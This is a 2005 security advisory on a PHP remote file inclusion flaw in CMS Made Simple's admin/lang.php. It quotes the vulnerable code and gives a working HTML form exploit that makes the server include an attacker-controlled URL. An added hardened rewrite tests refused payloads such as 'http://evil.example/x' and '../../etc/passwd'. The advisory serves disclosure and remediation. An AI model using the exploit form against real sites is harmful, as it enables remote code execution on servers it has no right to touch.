Packet Storm Security, PACKETSTORM:39768
CMS010.txt
Author: Filip Groszynski
Published: Sep 01, 2005
Source: packetstormsecurity.com
-- == -- == -- == -- == -- == -- == -- == -- == -- == --
Name: CMS Made Simple - PHP injection   
Version <= 0.10  
Homepage: http://www.cmsmadesimple.org/  
  
Author: Filip Groszynski (VXSfx)  
Date: 31 August 2005  
-- == -- == -- == -- == -- == -- == -- == -- == -- == --  
  
Background:  
  
CMS Made Simple is an easy-to-use content management
system for simple, stable content sites. It uses PHP, MySQL
and the Smarty templating system.
  
--------------------------------------------------------  
  
Vulnerable code exists in ./admin/lang.php (lines marked [!] form the chain):
  
<?php
...
$current_language = "en_US";
#Only do language stuff for admin pages
[!] if (isset($CMS_ADMIN_PAGE)) {   #plain global: with register_globals, ?CMS_ADMIN_PAGE=1 sets it
...
    #Check to see if there is already a language in use...
    if (isset($_POST["change_cms_lang"])) {
[!]     $current_language = $_POST["change_cms_lang"];   #raw user input, never validated
        setcookie("cms_language", $_POST["change_cms_lang"]);
    } else if (isset($_COOKIE["cms_language"])) {
        $current_language = $_COOKIE["cms_language"];   #same unvalidated value via cookie
    }
    else {
    ...
    }

    #Ok, we have a language to load, let's load it already...
    if (isset($nls['file'][$current_language])) {   #$nls is also a plain global
        foreach ($nls['file'][$current_language] as $onefile) {
[!]         include($onefile);   #path or URL chosen by the attacker
        }
    }
...
}
...
?>
--------------------------------------------------------

On a host with register_globals enabled, every request parameter becomes a
PHP global, so the query string alone can define $CMS_ADMIN_PAGE and the
nested $nls['file'] array. The attacker then names the injected entry in
change_cms_lang (the cookie branch accepts the same unvalidated value), and
include() loads whatever path the attacker placed in the table. With
allow_url_fopen on, that path can be a remote URL and the server executes
attacker-supplied PHP; with it off, the same flaw still includes arbitrary
local files.

Exploit:

Save the form below as example.html, replace (__VICTIM__) with the target
host and (__URL__) with the location of a PHP file you control, open it in
a browser and submit it. The $nls entry and CMS_ADMIN_PAGE travel in the
query string, change_cms_lang in the POST body.
  
example.html:  
<form action="http://(__VICTIM__)/admin/lang.php?CMS_ADMIN_PAGE=1&nls[file][vx][vxsfx]=(__URL__)" method=post>  
<input type=hidden name=change_cms_lang value=vx>  
<input type=submit name=test VALUE="do it">  
</form>  
EOF  
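A hardened rewrite of the lang.php logic, added here as an example (it is not CMS Made Simple project code). It assumes the admin entry point defines a CMS_ADMIN_PAGE constant before including the file, that language files live under admin/lang, and uses a constructed sample $nls table in place of the project's own. The three [!] points are closed in order: the admin flag is a constant rather than a global, the language table is built from trusted code rather than taken from a global, and the include target is restricted to an exact key of that table resolved to a basename inside the language directory.

```php
<?php
// Added example: a hardened rewrite of the admin/lang.php logic quoted above.
// This is not CMS Made Simple project code. The constant CMS_ADMIN_PAGE, the
// $langdir layout and the sample $nls table below are assumptions.

// 1. The admin entry point defines a constant before including this file
//    (assumed: define('CMS_ADMIN_PAGE', 1); in admin/index.php). A constant
//    cannot be injected through the query string, unlike a global variable.
if (PHP_SAPI !== 'cli' && !defined('CMS_ADMIN_PAGE')) {
    return;
}

// 2. The language table is built here from trusted code, never from a global
//    that register_globals might have populated. (Constructed sample; the real
//    tree would load it from a packaged file inside the language directory.)
$nls = array(
    'file' => array(
        'en_US' => array('en_US.php'),
        'pl_PL' => array('pl_PL.php'),
    ),
);
$langdir = dirname(__FILE__) . '/lang';

// 3. Resolve the requested language against the whitelist of packaged
//    languages. Only an exact key of $nls['file'] is accepted; anything else
//    (vx, ../../x, http://..., empty, arrays) falls back to the default.
function choose_language(array $nls, $post, $cookie, $default = 'en_US')
{
    $requested = is_string($post) ? $post : (is_string($cookie) ? $cookie : null);
    if ($requested !== null
        && preg_match('/^[a-z]{2}_[A-Z]{2}$/', $requested)
        && isset($nls['file'][$requested])) {
        return $requested;
    }
    return $default;
}

// 4. Turn the table entries into paths under $langdir. basename() strips any
//    directory or URL component, so even a corrupted table cannot point the
//    include outside the language directory or at a remote host.
function language_file_paths(array $nls, $lang, $langdir)
{
    $paths = array();
    if (!isset($nls['file'][$lang])) {
        return $paths;
    }
    foreach ($nls['file'][$lang] as $onefile) {
        $paths[] = $langdir . '/' . basename($onefile);
    }
    return $paths;
}

$current_language = choose_language(
    $nls,
    isset($_POST['change_cms_lang']) ? $_POST['change_cms_lang'] : null,
    isset($_COOKIE['cms_language']) ? $_COOKIE['cms_language'] : null
);

if (isset($_POST['change_cms_lang'])) {
    // Persist only the validated value, never the raw POST field.
    setcookie('cms_language', $current_language);
}

// The include stays at file scope so the language file's variables land in
// the same scope the rest of the admin code expects.
foreach (language_file_paths($nls, $current_language, $langdir) as $path) {
    if (is_file($path)) {
        include $path;
    }
}

// Self-check when run from the command line: the advisory's payload is refused.
if (PHP_SAPI === 'cli') {
    $ok = choose_language($nls, 'vx', null) === 'en_US'
        && choose_language($nls, 'http://evil.example/x', null) === 'en_US'
        && choose_language($nls, array('x'), null) === 'en_US'
        && choose_language($nls, null, '../../etc/passwd') === 'en_US'
        && choose_language($nls, 'pl_PL', null) === 'pl_PL'
        && choose_language($nls, null, 'pl_PL') === 'pl_PL'
        && language_file_paths($nls, 'pl_PL', '/srv/cms/admin/lang')
           === array('/srv/cms/admin/lang/pl_PL.php');
    echo $ok ? "hardened lang.php checks passed\n" : "CHECK FAILED\n";
}
```

Code changes alone are not enough on a host that still runs with register_globals: set register_globals = Off in php.ini, httpd.conf or .htaccess (it is a PHP_INI_PERDIR setting, so ini_set() at runtime cannot disable it), and set allow_url_fopen = Off unless the site genuinely needs remote fetches, which removes the remote-include path entirely.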
  
--------------------------------------------------------  
  
Contact:  
  
Author: Filip Groszynski (VXSfx)  
Location: Poland <Warsaw>  
Email: groszynskif <|> gmail <|> com  
  
-- == -- == -- == -- == -- == -- == -- == -- == -- == --  